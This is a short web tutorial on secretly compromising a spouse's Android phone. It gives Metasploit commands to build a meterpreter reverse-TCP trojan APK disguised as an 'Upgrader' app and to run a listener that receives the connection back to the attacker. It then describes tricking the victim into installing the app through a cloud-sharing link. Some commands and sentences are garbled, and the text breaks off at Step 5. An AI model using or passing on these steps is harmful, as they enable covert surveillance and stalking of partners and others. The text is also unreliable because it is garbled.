How to remotely hack into the phone of a cheating spouse

You must be familiar with the Kali Linux operating system and know how to utilize it.
Step 1: Turn on Kali’s pyre:
Create a Trojan.apk file on a terminal by typing “trojan.apk” in the command line.
This may be accomplished by entering the following: msfpayload android/meterpreter/reverse tcp LHOST= R > /root/Upgrader.apk LHOST= R (replace LHOST with your own IP)
You may also hack Android through a wide area network (WAN), i.e. through the internet, by entering your public/external IP address in the LHOST and port forwarding it (ask me about port forwarding if you have problems in the comment section)

Step 2: Open a second terminal window:
Continue to use another terminal until the file has been created.
Load the Metasploit console by entering the following: msfconsole
Step 3: Configure a Listener:
After it has finished loading (which will take some time), run the multi-handler exploit by typing: exploit/multi/handler is a good choice.
Create a (reverse) payload by entering the following: set payload android/meterpreter/reverse tcp as the destination
To configure the L host type, do the following: If you are hacking on a WAN, provide your private/internal IP address here rather than your public/external address (even if you are hacking on a LAN).
Step 4: Take advantage of the situation!
Finally, type: exploit to begin the listener’s execution.
Make a copy of the program that you created (Upgrader.apk) and paste it into the root folder of your Android phone.
Then you may send it using Uploading it to a cloud storage service such as Dropbox or another sharing website
Then, using the URL provided by the website, transmit it to your friends and take use of their mobile phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
Allow the victim to download and install the Upgrader app (under the impression that it is intended to improve certain capabilities on his phone), and then when he taps Open…
Step 5 — KA-CHING!
Here’s what the meterpreter asks you to do: